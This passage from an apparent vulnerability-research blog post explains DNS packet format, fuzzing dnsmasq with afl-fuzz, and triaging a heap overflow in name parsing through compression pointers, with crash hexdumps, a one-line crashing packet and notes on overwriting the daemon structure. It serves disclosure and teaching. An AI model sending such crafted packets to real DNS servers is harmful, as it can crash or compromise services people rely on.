  • (int16) transaction id (trn_id)
  • (int16) flags (which include QR [query/response], opcode, RD [recursion desired], RA [recursion available], and probably other stuff that I'm forgetting)
  • (int16) question count (qdcount)
  • (int16) answer count (ancount)
  • (int16) authority count (nscount)
  • (int16) additional count (arcount)
  • (variable) questions
  • (variable) answers
  • (variable) authorities
  • (variable) additionals

The last four fields - questions, answers, authorities, and additionals - are collectively called "resource records". Resource records of different types have different properties, but we aren't going to worry about that. The general structure of a question record is:

  • (variable) name (the important part!)
  • (int16) type (A/AAAA/CNAME/etc.)
  • (int16) class (basically always 0x0001, for Internet addresses)
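
In code, that fixed 12-byte header unpacks with a single struct call; everything after it is variable-length. A minimal Python sketch:

import struct

def parse_header(packet):
    # The header is six big-endian (network order) 16-bit fields, 12 bytes total.
    trn_id, flags, qdcount, ancount, nscount, arcount = struct.unpack(">6H", packet[:12])
    return {"trn_id": trn_id, "flags": flags, "qdcount": qdcount,
            "ancount": ancount, "nscount": nscount, "arcount": arcount}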

DNS names

Questions and answers typically contain a domain name. A domain name, as we typically see it, looks like:

this.is.a.name.skullseclabs.org

But in a resource record, there aren't actually any periods; instead, each field is preceded by its length, with a null terminator (or a zero-length field) at the end:

\x04this\x02is\x01a\x04name\x0cskullseclabs\x03org\x00

The maximum length of a field is 63 - 0x3f - bytes. If a field starts with 0x40, 0x80, 0xc0, and possibly others, it has a special meaning (we'll get to that shortly).
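
Here's that encoding as a small Python sketch (ignoring the special length values for now):

def encode_name(name):
    # Each dotted field becomes a length byte followed by the field itself,
    # with a zero-length field terminating the name.
    out = b""
    for field in name.split("."):
        assert len(field) <= 63  # longer lengths are the special cases below
        out += bytes([len(field)]) + field.encode("ascii")
    return out + b"\x00"

print(encode_name("this.is.a.name.skullseclabs.org"))
# => b'\x04this\x02is\x01a\x04name\x0cskullseclabs\x03org\x00'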

Questions and answers

When you send a question to a DNS server, the packet looks something like:

  • (header)
  • question count = 1
  • question 1: ANY record for skullsecurity.org?

and the response looks like:

  • (header)
  • question count = 1
  • answer count = 11
  • question 1: ANY record for "skullsecurity.org"?
  • answer 1: "skullsecurity.org" has a TXT record of "oh hai NSA"
  • answer 2: "skullsecurity.org" has a MX record for "ASPMX.L.GOOGLE.com".
  • answer 3: "skullsecurity.org" has a A record for "206.220.196.59"
  • ...

(yes, those are some of my real records :) )

If you do the math, you'll see that "skullsecurity.org" takes up 18 bytes, and would be included in the response packet 12 times, counting the question, which means we're effectively wasting 18 * 11 or close to 200 bytes. In the old days, 200 bytes were a lot. Heck, in the new days, 200 bytes are still a lot when you're dealing with millions of requests.

Record pointers

Remember how I said that name fields starting with numbers above 63 - 0x3f - are special? Well, the one we're going to pay attention to is 0xc0.

0xc0 effectively means, "the next byte is a pointer, starting from the first byte of the packet, to where you can find the rest of the name".

So typically, you'll see:

  • 12-bytes header (trn_id + flags + counts)
  • question 1: ANY record for "skullsecurity.org"
  • answer 1: \xc0\x0c has a TXT record of "oh hai NSA"
  • answer 2: \xc0\x0c ...

"\xc0" indicates a pointer is coming, and "\x0c" says "look 0x0c (12) bytes from the start of the packet", which is immediately after the header. You can also use it as part of a domain name, so your answer could be "\x03www\xc0\x0c", which would become "www.skullsecurity.org" (assuming that string was 12 bytes from the start).

This is only mildly relevant, but a common problem that DNS parsers (both clients and servers) have to deal with is the infinite loop attack. Basically, the following packet structure:

  • 12-byte header
  • question 1: ANY record for "\xc0\x0c"

Because question 1 is self-referential, it reads itself over and over, and the name never finishes parsing. dnsmasq solves this by limiting a name to 256 pointer hops - that decision prevents a denial-of-service attack, but it's also what makes this vulnerability likely exploitable. :)
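
To illustrate what a defensive parser has to do, here's a Python sketch with that kind of hop limit (my own illustration, not dnsmasq's actual C code):

def parse_name(packet, offset, max_hops=256):
    # Walk length-prefixed fields, following 0xc0-style compression pointers,
    # and bail out if we hop more than max_hops times (most likely a loop).
    fields = []
    hops = 0
    while True:
        length = packet[offset]
        if length == 0:
            return ".".join(fields)
        if length & 0xc0 == 0xc0:
            hops += 1
            if hops > max_hops:
                raise ValueError("too many pointer hops - probably a loop")
            # the pointer target is the low 6 bits of this byte plus the next byte
            offset = ((length & 0x3f) << 8) | packet[offset + 1]
        else:
            fields.append(packet[offset + 1:offset + 1 + length].decode("ascii"))
            offset += 1 + length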

Setting up the fuzz

All right, by now we're DNS experts, right? Good, because we're going to be building a DNS packet by hand right away!

Before we get to the actual vulnerability, I want to talk about how I set up the fuzzing. Since dnsmasq is a networked application, it would make sense to use a network fuzzer; however, I really wanted to try out afl-fuzz from lcamtuf, which is a file-format fuzzer.

afl-fuzz is an intelligent file-format fuzzer that instruments the executable (either by specially compiling it or by using binary analysis) to determine whether or not it's hitting "new" code on each execution. It optimizes each cycle to take advantage of all the new code paths it's found. It's really quite cool!

Unfortunately, DNS doesn't use files; it uses packets. But because the client and server each process a single packet at a time, I decided to modify dnsmasq to read a packet from a file, parse it (either as a request or a response), then exit. That made it possible to fuzz with afl-fuzz.

Unfortunately, that was actually pretty non-trivial. The parsing code and networking code were all mixed together. I ended up re-implementing "recv_msg()" and "recv_from()", among other things, and replacing calls to those functions. That could also have been done with an LD_PRELOAD hook, but because I had source, that wasn't necessary. If you want to see the changes I made to make fuzzing possible, you can search the codebase for "#ifdef FUZZ" - I made the fuzzing stuff entirely optional.

If you want to follow along, you should be able to reproduce the crash with the following commands (I'm on 64-bit Linux, but I don't see why it wouldn't work elsewhere):

$ git clone https://github.com/iagox86/dnsmasq-fuzzing
Cloning into 'dnsmasq-fuzzing'...
[...]
$ cd dnsmasq-fuzzing/
$ CFLAGS=-DFUZZ make -j10
[...]
$ ./src/dnsmasq -d --randomize-port --client-fuzz fuzzing/crashes/client-heap-overflow-1.bin
dnsmasq: started, version  cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth DNSSEC loop-detect inotify
dnsmasq: reading /etc/resolv.conf
[...]
Segmentation fault

Warning: DNS is recursive, and in my fuzzing modifications I didn't disable recursive requests. That means that dnsmasq will forward some of your traffic to upstream DNS servers, and that traffic could impact those servers (and I actually proved that, by accident; but we won't get into that :) ).

Doing the actual fuzzing

Once you've set up the program to be fuzzable, fuzzing it is actually really easy.

First, you need a DNS request and response - that way, we can fuzz both sides (though ultimately, we don't need to for this particular vulnerability, since both the request and response parse names).

If you've wasted your life like I have, you can just write the request by hand and send it to a server, then capture the response:

$ mkdir -p fuzzing/client/input/
$ mkdir -p fuzzing/client/output/
$ echo -ne "\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x06google\x03com\x00\x00\x01\x00\x01" > fuzzing/client/input/request.bin
$ mkdir -p fuzzing/server/input/
$ mkdir -p fuzzing/server/output/
$ cat fuzzing/client/input/request.bin | nc -vv -u 8.8.8.8 53 > fuzzing/server/input/response.bin

To break down the packet, in case you're curious (a scripted version follows the list):

  • "\x12\x34" - trn_id - just a random number
  • "\x01\x00" - flags - I think that flag is RD - recursion desired
  • "\x00\x01" - qdcount = 1
  • "\x00\x00" - ancount = 0
  • "\x00\x00" - nscount = 0
  • "\x00\x00" - arcount = 0
  • "\x06google\x03com\x00" - name = "google.com"
  • "\x00\x01" - type = A record
  • "\x00\x01" - class = IN (Internet)
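
And if you'd rather script it than hand-type escape sequences, here's a Python sketch that builds the same 28 bytes field by field (the output path matches the echo command above):

import struct

header = struct.pack(">6H", 0x1234, 0x0100, 1, 0, 0, 0)  # trn_id, RD flag, qdcount=1
question = b"\x06google\x03com\x00" + struct.pack(">2H", 1, 1)  # type A, class IN

with open("fuzzing/client/input/request.bin", "wb") as f:
    f.write(header + question)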

You can verify it's working by hexdump'ing the response:

$ hexdump -C fuzzing/server/input/response.bin
00000000  12 34 81 80 00 01 00 0b  00 00 00 00 06 67 6f 6f  |.4...........goo|
00000010  67 6c 65 03 63 6f 6d 00  00 01 00 01 c0 0c 00 01  |gle.com.........|
00000020  00 01 00 00 01 2b 00 04  ad c2 21 67 c0 0c 00 01  |.....+....!g....|
00000030  00 01 00 00 01 2b 00 04  ad c2 21 66 c0 0c 00 01  |.....+....!f....|
00000040  00 01 00 00 01 2b 00 04  ad c2 21 69 c0 0c 00 01  |.....+....!i....|
00000050  00 01 00 00 01 2b 00 04  ad c2 21 68 c0 0c 00 01  |.....+....!h....|
00000060  00 01 00 00 01 2b 00 04  ad c2 21 63 c0 0c 00 01  |.....+....!c....|
00000070  00 01 00 00 01 2b 00 04  ad c2 21 61 c0 0c 00 01  |.....+....!a....|
00000080  00 01 00 00 01 2b 00 04  ad c2 21 6e c0 0c 00 01  |.....+....!n....|
00000090  00 01 00 00 01 2b 00 04  ad c2 21 64 c0 0c 00 01  |.....+....!d....|
000000a0  00 01 00 00 01 2b 00 04  ad c2 21 60 c0 0c 00 01  |.....+....!`....|
000000b0  00 01 00 00 01 2b 00 04  ad c2 21 65 c0 0c 00 01  |.....+....!e....|
000000c0  00 01 00 00 01 2b 00 04  ad c2 21 62              |.....+....!b|

Notice how it starts with "\x12\x34" (the same transaction id I sent), has a question count of 1, has an answer count of 0x0b (11), and contains "\x06google\x03com\x00" 12 bytes in (that's the question). That's basically what we discussed earlier. But the important part is, it has "\xc0\x0c" throughout. In fact, every answer starts with "\xc0\x0c", because every answer is to the first and only question.

That's exactly what I was talking about earlier - each of those 11 instances of "\xc0\x0c" saved about 10 bytes, so the packet is 110 bytes shorter than it would otherwise have been.

Now that we have base cases for both the client and the server, we can compile the binary with afl-fuzz's instrumentation. Obviously, this command assumes that afl-fuzz is stored in "~/tools/afl-1.77b" - change as necessary. If you're trying to compile the original code, note that it doesn't accept CC= or CFLAGS= on the command line unless you apply this patch first.

Here's the compile command:

$ CC=~/tools/afl-1.77b/afl-gcc CFLAGS=-DFUZZ make -j20

and run the fuzzer:

$ ~/tools/afl-1.77b/afl-fuzz -i fuzzing/client/input/ -o fuzzing/client/output/ ./src/dnsmasq --client-fuzz=@@

You can simultaneously fuzz the server, too, in a different window:

$ ~/tools/afl-1.77b/afl-fuzz -i fuzzing/server/input/ -o fuzzing/server/output/ ./src/dnsmasq --server-fuzz=@@

Then let them run for a few hours, or possibly overnight.

For fun, I ran a third instance:

$ mkdir -p fuzzing/hello/input
$ echo "hello" > fuzzing/hello/input/hello.bin
$ mkdir -p fuzzing/hello/output
$ ~/tools/afl-1.77b/afl-fuzz -i fuzzing/hello/input/ -o fuzzing/hello/output/ ./src/dnsmasq --server-fuzz=@@

...which, in spite of being seeded with "hello" instead of an actual DNS packet, actually found an order of magnitude more crashes than the proper packets did, though with much, much uglier proofs of concept. :)

Fuzz results

I let this run overnight, specifically to re-create the crashes for this blog. In the morning (after roughly 20 hours of fuzzing), the results were:

  • 7 crashes starting with a well-formed request
  • 10 crashes starting from a well-formed response
  • 93 crashes starting from "hello"

You can download the base cases and results here, if you want.

Triage

Although we have over a hundred crashes, I know from experience that they're all likely caused by the same core problem. But not knowing that for certain, I need to pick something to triage! The difference between starting from a well-formed request and starting from a "hello" string is noticeable... to take the smallest PoC from "hello", we have:

crashes $ hexdump -C id\:000024\,sig\:11\,src\:000234+000399\,op\:splice\,rep\:16
00000000  68 00 00 00 00 01 00 02  e8 1f ec 13 07 06 e9 01  |h...............|
00000010  67 02 e8 1f c0 c0 c0 c0  c0 c0 c0 c0 c0 c0 c0 c0  |g...............|
00000020  c0 c0 c0 c0 c0 c0 c0 c0  c0 c0 c0 c0 c0 c0 c0 c0  |................|
00000030  c0 c0 c0 c0 c0 c0 c0 c0  c0 c0 b8 c0 c0 c0 c0 c0  |................|
00000040  c0 c0 c0 c0 c0 c0 c0 c0  c0 c0 c0 c0 c0 c0 c0 c0  |................|
00000050  c0 c0 c0 c0 c0 c0 c0 c0  c0 af c0 c0 c0 c0 c0 c0  |................|
00000060  c0 c0 c0 c0 cc 1c 03 10  c0 01 00 00 02 67 02 e8  |.............g..|
00000070  1f eb ed 07 06 e9 01 67  02 e8 1f 2e 2e 10 2e 2e  |.......g........|
00000080  00 07 2e 2e 2e 2e 00 07  01 02 07 02 02 02 07 06  |................|
00000090  00 00 00 00 7e bd 02 e8  1f ec 07 07 01 02 07 02  |....~...........|
000000a0  02 02 07 06 00 00 00 00  02 64 02 e8 1f ec 07 07  |.........d......|
000000b0  06 ff 07 9c 06 49 2e 2e  2e 2e 00 07 01 02 07 02  |.....I..........|
000000c0  02 02 05 05 e7 02 02 02  e8 03 02 02 02 02 80 c0  |................|
000000d0  c0 c0 c0 c0 c0 c0 c0 c0  c0 80 1c 03 10 80 e6 c0  |................|
000000e0  c0 c0 c0 c0 c0 c0 c0 c0  c0 c0 c0 c0 c0 c0 c0 c0  |................|
000000f0  c0 c0 c0 c0 c0 c0 b8 c0  c0 c0 c0 c0 c0 c0 c0 c0  |................|
00000100  c0 c0 c0 c0 c0 c0 c0 c0  c0 c0 c0 c0 c0 c0 c0 c0  |................|
00000110  c0 c0 c0 c0 c0 af c0 c0  c0 c0 c0 c0 c0 c0 c0 c0  |................|
00000120  cc 1c 03 10 c0 01 00 00  02 67 02 e8 1f eb ed 07  |.........g......|
00000130  00 95 02 02 02 05 e7 02  02 10 02 02 02 02 02 00  |................|
00000140  00 80 03 02 02 02 f0 7f  c7 00 80 1c 03 10 80 e6  |................|
00000150  00 95 02 02 02 05 e7 67  02 02 02 02 02 02 02 00  |.......g........|
00000160  00 80                                             |..|

Or, if we run afl-tmin on it to minimize:

00000000  30 30 00 30 00 01 30 30  30 30 30 30 30 30 30 30  |00.0..0000000000|
00000010  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
00000020  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
00000030  30 30 30 30 30 30 30 30  30 30 30 30 30 c0 c0 30  |0000000000000..0|
00000040  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
00000050  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
00000060  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
00000070  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
00000080  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
00000090  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
000000a0  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
000000b0  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
000000c0  05 30 30 30 30 30 c0 c0                           |.00000..|

(Note the 0xc0 at the end - our old friend - but instead of finding "\xc0\x0c", the simplest case, the fuzzer stumbled onto a much more convoluted way to hit the same bug.)

Whereas here are four of the crashing messages from the valid request starting point:

crashes $ hexdump -C id\:000000\,sig\:11\,src\:000034\,op\:flip2\,pos\:24
00000000  12 34 01 00 00 01 00 00  00 00 00 00 06 67 6f 6f  |.4...........goo|
00000010  67 6c 65 03 63 6f 6d c0  0c 01 00 01              |gle.com.....|
0000001c
crashes $ hexdump -C id\:000001\,sig\:11\,src\:000034\,op\:havoc\,rep\:4
00000000  12 34 08 00 00 01 00 00  e1 00 00 00 06 67 6f 6f  |.4...........goo|
00000010  67 6c 65 03 63 6f 6d c0  0c 01 00 01              |gle.com.....|
0000001c
crashes $ hexdump -C id\:000002\,sig\:11\,src\:000034\,op\:havoc\,rep\:2
00000000  12 34 01 00 eb 00 00 00  00 00 00 00 06 67 6f 6f  |.4...........goo|
00000010  67 6c 65 03 63 6f 6d c0  0c 01 00 01              |gle.com.....|
crashes $ hexdump -C id\:000003\,sig\:11\,src\:000034\,op\:havoc\,rep\:4
00000000  12 34 01 00 00 01 01 00  00 00 10 00 06 67 6f 6f  |.4...........goo|
00000010  67 6c 65 03 63 6f 6d c0  0c 00 00 00 00 00 06 67  |gle.com........g|
00000020  6f 6f 67 6c 65 03 63 6f  6d c0 00 01 00 01        |oogle.com.....|
0000002e

The first three crashes are interesting, because they're very similar. The only differences are the flags field (0x0100 or 0x0800) and the count fields (the first is unmodified, the second has 0xe100 "authority" records listed, and the third has 0xeb00 "question" records). Presumably, that stuff doesn't matter, since random-looking values work.
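For reference, here's how those bytes map onto the standard RFC 1035 header layout (a sketch; the field names are the conventional ones, not necessarily dnsmasq's):

#include <stdint.h>

/* All fields are big-endian on the wire. */
struct dns_header {
  uint16_t id;      /* transaction id - 0x1234 in our base case       */
  uint16_t flags;   /* 0x0100 normally; 0x0800 in the second crash    */
  uint16_t qdcount; /* questions - 0xeb00 in the third crash          */
  uint16_t ancount; /* answers                                        */
  uint16_t nscount; /* authority records - 0xe100 in the second crash */
  uint16_t arcount; /* additional records                             */
};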

Also note that near the end of every message, we see our old friend again: "\xc0\x0c".

We can run afl-tmin on the first one to get the tightest message we can:
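A plausible invocation (the input is the first crash file from above; min.bin is an output name I picked, matching the gdb command below):

$ ~/tools/afl-1.77b/afl-tmin -i 'id:000000,sig:11,src:000034,op:flip2,pos:24' -o min.bin ./dnsmasq --client-fuzz=@@

The minimized result: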

00000000  30 30 30 30 30 30 30 30  30 30 30 30 06 30 6f 30  |000000000000.0o0|
00000010  30 30 30 03 30 30 30 c0  0c                       |000.000..|

As predicted, the question and answer counts don't matter. All that matters is the name's length fields and the "\xc0\x0c". Oddly, it kept the "o" from google.com, which is probably a bug (my fuzzing instrumentation isn't perfect: because requests go out to the Internet, the result isn't always deterministic).

The vulnerability

Now that we have a decent PoC, let's check it out in a debugger:

$ gdb -q --args ./dnsmasq -d --randomize-port --client-fuzz=./min.bin
Reading symbols from ./dnsmasq...done.
Unable to determine compiler version.
Skipping loading of libstdc++ pretty-printers for now.
(gdb) run
[...]
Program received signal SIGSEGV, Segmentation fault.
__strcpy_sse2 () at ../sysdeps/x86_64/multiarch/../strcpy.S:135
135     ../sysdeps/x86_64/multiarch/../strcpy.S: No such file or directory.

It crashed in strcpy. Fun! Let's look at the instruction it crashed on:

(gdb) x/i $rip
=> 0x7ffff73cc600 <__strcpy_sse2+192>:  mov    BYTE PTR [rdx],al
(gdb) print/x $rdx
$1 = 0x0

Oh, a null-pointer write. Seems pretty lame.

Honestly, when I got here, I lost steam. Null-pointer dereferences need to be fixed, especially because they can hide other bugs, but they aren't going to earn me l33t status. So I would have to fix it or deal with hundreds of crappy results.

If we look at the packet in more detail, the name it's parsing is essentially "\x06AAAAAA\x03AAA\xc0\x0c" (I changed '0' to 'A' to make it easier on the eyes). The "\xc0\x0c" construct references offset 12 in the message, which is the start of the name itself. After one round of parsing, the output is "\x06AAAAAA\x03AAA\x06AAAAAA\x03AAA\xc0\x0c". But then the parser reaches the "\xc0\x0c" again and jumps back to the beginning. Basically, the name parser loops forever.

So, it's obvious that a self-referential name causes the problem. But why?

I tracked down the code that handles 0xc0. It's in rfc1035.c, and looks like:

     if (label_type == 0xc0) /* pointer */
        {
          if (!CHECK_LEN(header, p, plen, 1))
            return 0;

          /* get offset */
          l = (l&0x3f) << 8;
          l |= *p++;

          if (!p1) /* first jump, save location to go back to */
            p1 = p;

          hops++; /* break malicious infinite loops */
          if (hops > 255)
          {
            printf("Too many hops!\n");
            printf("Returning: [%d] %s\n", ((uint64_t)cp) - ((uint64_t)name), name);
            return 0;
          }

          p = l + (unsigned char *)header;
        }

If you look at that code, everything looks pretty okay (and for what it's worth, the printf()s are my instrumentation and aren't in the original). If that's not the problem, the only other field type being parsed is the name part (i.e., the part without 0x40/0xc0/etc. in front). Here's the code (with a bunch of stuff removed and the indents re-flowed):

  namelen += l;
  if (namelen+1 >= MAXDNAME)
  {
    printf("namelen is too long!\n"); /* <-- This is what triggers. */
    printf("Returning: [%d] %s\n", ((uint64_t)cp) - ((uint64_t)name), name);
    return 0;
  }
  if (!CHECK_LEN(header, p, plen, l))
  {
    printf("CHECK_LEN failed!\n");
    return 0;
  }
  for(j=0; j<l; j++, p++)
  {
    unsigned char c = *p;
    if (c != 0 && c != '.')
      *cp++ = c;
    else
      return 0;
  }
  *cp++ = '.';

This code runs for each segment that starts with a value less than 64 ("google" and "com", for example).

At the start, l is the length of the segment (so 6 in the case of "google"). It adds that to the current TOTAL length - namelen - then checks if it's too long - this is the check that prevents a buffer overflow.

Then it reads in l bytes, one at a time, and copies them into a buffer - cp - which happens to be on the heap. The namelen check is what prevents that copy from overflowing.

Then it copies a period into the buffer and doesn't increment namelen.

Do you see the problem? It adds l to the running total, but then writes l + 1 bytes into the buffer, counting the period. Oops?
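To make the accounting concrete, here's a tiny standalone simulation of that mismatch for the name "\x06google\x03com" (illustrative code, not dnsmasq's):

#include <stdio.h>

int main(void)
{
  /* "\x03" is kept as a separate literal so the 'c' of "com" isn't
     swallowed into the hex escape. */
  const unsigned char name[] = "\x06google" "\x03" "com";
  const unsigned char *p = name;
  size_t counted = 0, written = 0;

  while (*p)
  {
    unsigned char l = *p++;
    counted += l;      /* what the namelen check accounts for  */
    written += l + 1;  /* label bytes plus the appended period */
    p += l;
  }
  printf("counted=%zu written=%zu\n", counted, written); /* counted=9 written=11 */
  return 0;
}

Every label leaks one uncounted byte - harmless for a normal name, but fatal once "\xc0\x0c" lets you repeat labels hundreds of times.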

It turns out you can mess around with the length and number of the segments quite a bit to get a lot of control over what's written where, but exploiting it is as simple as doing a lookup for "\x08AAAAAAAA\xc0\x0c":

$ echo -ne '\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x08AAAAAAAA\xc0\x0c\x00\x00\x01\x00\x01' > crash.bin
$ ./dnsmasq -d --randomize-port --client-fuzz=./crash.bin
[...]
Segmentation fault

However, there are two termination conditions: it'll only loop a grand total of 255 times, and it stops after namelen reaches 1024 (non-period) bytes. So coming up with the best possible balance to overwrite what you want is actually pretty tricky - possibly even requires a bit of calculus (or, if you're an engineer, a program that can optimize it for you :) ).

I should also mention: the reason the "\xc0\x0c" is needed in the first place is that it's impossible to send a name that's 1024 bytes long - somewhere along the line, it runs afoul of a length check. The "\xc0\x0c" method lets us repeat stuff over and over, sort of like decompressing a small string into memory, overflowing the buffer.
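To get a feel for how far the "decompression" outruns the check, here's a toy simulation of the "\x08AAAAAAAA\xc0\x0c" lookup. It assumes dnsmasq's MAXDNAME value of 1025 (consistent with the 1024-byte limit mentioned above) and the order of operations from the snippet earlier:

#include <stdio.h>

#define MAXDNAME 1025 /* dnsmasq's limit; the check is namelen+1 >= MAXDNAME */

int main(void)
{
  int namelen = 0, written = 0, hops = 0;

  while (hops < 255) /* the hop limit from the 0xc0 handler */
  {
    namelen += 8;                /* what the check counts per "AAAAAAAA" */
    if (namelen + 1 >= MAXDNAME) /* the overflow guard */
      break;
    written += 9;                /* 8 'A's plus the uncounted period */
    hops++;
  }
  printf("bytes written: %d into a %d-byte buffer\n", written, MAXDNAME - 1);
  return 0;
}

This simple payload already writes 1143 bytes - about 119 past the end; as the exploit section below mentions, juggling the padding and segment sizes pushes the total to 1368.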

Exploitability

I mentioned earlier that it's a null-pointer deref:

(gdb) x/i $rip
=> 0x7ffff73cc600 <__strcpy_sse2+192>:  mov    BYTE PTR [rdx],al
(gdb) print/x $rdx
$1 = 0x0

Let's try again with the crash.bin file we just created, using "\x08AAAAAAAA\xc0\x0c" as the payload:

$ echo -ne '\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x08AAAAAAAA\xc0\x0c\x00\x00\x01\x00\x01' > crash.bin
$ gdb -q --args ./dnsmasq -d --randomize-port --client-fuzz=./crash.bin
[...]
(gdb) run
[...]
(gdb) x/i $rip
=> 0x449998 <answer_request+1064>:      mov    DWORD PTR [rdx+0x20],0x0
(gdb) print/x $rdx
$1 = 0x4141412e41414141

Whoa... that's not a null-pointer dereference! That's a write-NUL-byte-to-arbitrary-memory! Those might be exploitable!

As I mentioned earlier, this is actually a heap overflow. The interesting part is that the heap memory is allocated once - immediately after the program starts - and the global settings object (daemon) is allocated on the heap right after it. That means we effectively have full control of that object, or at least of its first couple hundred bytes:

extern struct daemon {
  /* datastructures representing the command-line and
     config file arguments. All set (including defaults)
     in option.c */

  unsigned int options, options2;
  struct resolvc default_resolv, *resolv_files;
  time_t last_resolv;
  char *servers_file;
  struct mx_srv_record *mxnames;
  struct naptr *naptr;
  struct txt_record *txt, *rr;
  struct ptr_record *ptr;
  struct host_record *host_records, *host_records_tail;
  struct cname *cnames;
  struct auth_zone *auth_zones;
  struct interface_name *int_names;
  char *mxtarget;
  int addr4_netmask;
  int addr6_netmask;
  char *lease_file;
  char *username, *groupname, *scriptuser;
  char *luascript;
  char *authserver, *hostmaster;
  struct iname *authinterface;
  struct name_list *secondary_forward_server;
  int group_set, osport;
  char *domain_suffix;
  struct cond_domain *cond_domain, *synth_domains;
  char *runfile;
  char *lease_change_command;
  struct iname *if_names, *if_addrs, *if_except, *dhcp_except, *auth_peers, *tftp_interfaces;
  struct bogus_addr *bogus_addr, *ignore_addr;
  struct server *servers;
  struct ipsets *ipsets;
  int log_fac; /* log facility */
  char *log_file; /* optional log file */
  int max_logs;  /* queue limit */
  int cachesize, ftabsize;
  int port, query_port, min_port;
  unsigned long local_ttl, neg_ttl, max_ttl, min_cache_ttl, max_cache_ttl, auth_ttl;
  struct hostsfile *addn_hosts;
  struct dhcp_context *dhcp, *dhcp6;
  struct ra_interface *ra_interfaces;
  struct dhcp_config *dhcp_conf;
  struct dhcp_opt *dhcp_opts, *dhcp_match, *dhcp_opts6, *dhcp_match6;
  struct dhcp_vendor *dhcp_vendors;
  struct dhcp_mac *dhcp_macs;
  struct dhcp_boot *boot_config;
  struct pxe_service *pxe_services;
  struct tag_if *tag_if;
  struct addr_list *override_relays;
  struct dhcp_relay *relay4, *relay6;
  int override;
  int enable_pxe;
  int doing_ra, doing_dhcp6;
  struct dhcp_netid_list *dhcp_ignore, *dhcp_ignore_names, *dhcp_gen_names;
  struct dhcp_netid_list *force_broadcast, *bootp_dynamic;
  struct hostsfile *dhcp_hosts_file, *dhcp_opts_file, *dynamic_dirs;
  int dhcp_max, tftp_max;
  int dhcp_server_port, dhcp_client_port;
  int start_tftp_port, end_tftp_port;
  unsigned int min_leasetime;
  struct doctor *doctors;
  unsigned short edns_pktsz;
  char *tftp_prefix;
  struct tftp_prefix *if_prefix; /* per-interface TFTP prefixes */
  unsigned int duid_enterprise, duid_config_len;
  unsigned char *duid_config;
  char *dbus_name;
  unsigned long soa_sn, soa_refresh, soa_retry, soa_expiry;
#ifdef OPTION6_PREFIX_CLASS
  struct prefix_class *prefix_classes;
#endif
#ifdef HAVE_DNSSEC
  struct ds_config *ds;
  char *timestamp_file;
#endif

  /* globally used stuff for DNS */
  char *packet; /* packet buffer */
  int packet_buff_sz; /* size of above */
  char *namebuff; /* MAXDNAME size buffer */
#ifdef HAVE_DNSSEC
  char *keyname; /* MAXDNAME size buffer */
  char *workspacename; /* ditto */
#endif
  unsigned int local_answer, queries_forwarded, auth_answer;
  struct frec *frec_list;
  struct serverfd *sfds;
  struct irec *interfaces;
  struct listener *listeners;
  struct server *last_server;
  time_t forwardtime;
  int forwardcount;
  struct server *srv_save; /* Used for resend on DoD */
  size_t packet_len;       /*      "        "        */
  struct randfd *rfd_save; /*      "        "        */
  pid_t tcp_pids[MAX_PROCS];
  struct randfd randomsocks[RANDOM_SOCKS];
  int v6pktinfo;
  struct addrlist *interface_addrs; /* list of all addresses/prefix lengths associated with all local interfaces */
  int log_id, log_display_id; /* ids of transactions for logging */
  union mysockaddr *log_source_addr;

  /* DHCP state */
  int dhcpfd, helperfd, pxefd;
#ifdef HAVE_INOTIFY
  int inotifyfd;
#endif
#if defined(HAVE_LINUX_NETWORK)
  int netlinkfd;
#elif defined(HAVE_BSD_NETWORK)
  int dhcp_raw_fd, dhcp_icmp_fd, routefd;
#endif
  struct iovec dhcp_packet;
  char *dhcp_buff, *dhcp_buff2, *dhcp_buff3;
  struct ping_result *ping_results;
  FILE *lease_stream;
  struct dhcp_bridge *bridges;
#ifdef HAVE_DHCP6
  int duid_len;
  unsigned char *duid;
  struct iovec outpacket;
  int dhcp6fd, icmp6fd;
#endif
  /* DBus stuff */
  /* void * here to avoid depending on dbus headers outside dbus.c */
  void *dbus;
#ifdef HAVE_DBUS
  struct watch *watches;
#endif

  /* TFTP stuff */
  struct tftp_transfer *tftp_trans, *tftp_done_trans;

  /* utility string buffer, hold max sized IP address as string */
  char *addrbuff;
  char *addrbuff2; /* only allocated when OPT_EXTRALOG */
} *daemon;

I haven't measured exactly how far into that structure you can write, but since we can put up to 1368 bytes into the 1024-byte buffer, the overflow spills 344 bytes past the end - so somewhere in the realm of the first 300 bytes of the structure are at risk.

We saw both a "null pointer dereference" and a "write NUL byte to arbitrary memory" because we overwrote variables in that structure that are used later.

Patch

The patch is pretty straightforward: add 1 to namelen to account for the periods. There was a second instance of the same vulnerability (a forgotten period) in the 0x40 handler as well.
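In terms of the loop shown earlier, the fix amounts to something like this (my sketch - the actual 2.73rc8 patch may differ in detail):

  namelen += l + 1;  /* was: namelen += l; -- now counts the period appended below */
  if (namelen+1 >= MAXDNAME)
    return 0;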

But..... I'm concerned about the whole idea of building a string while tracking its length separately. That's a dangerous design pattern, and the chance of a regression the next time the name-parsing code is modified is high.

Exploit so-far

I started writing an exploit for it. Before I stopped, I basically found a way to brute-force build a string that would overwrite an arbitrary number of bytes by adding the right amount of padding and the right number of periods. That turned out to be a fairly difficult job, because there are various things you have to juggle (the padding at the front of the string and the size of the repeated field). It turns out, the maximum length you can get is 1368 bytes put into a 1024-byte buffer.

You can download it here.

...why it never got famous

I held this back throughout the blog because it's the sad part. :)

It turns out, since I was working from the git HEAD version, I had been fuzzing brand new code. After bisecting versions to figure out where the vulnerable code came from, I determined that it was present only in 2.73rc5 - 2.73rc7. After I reported it, the author rolled out 2.73rc8 with the fix.

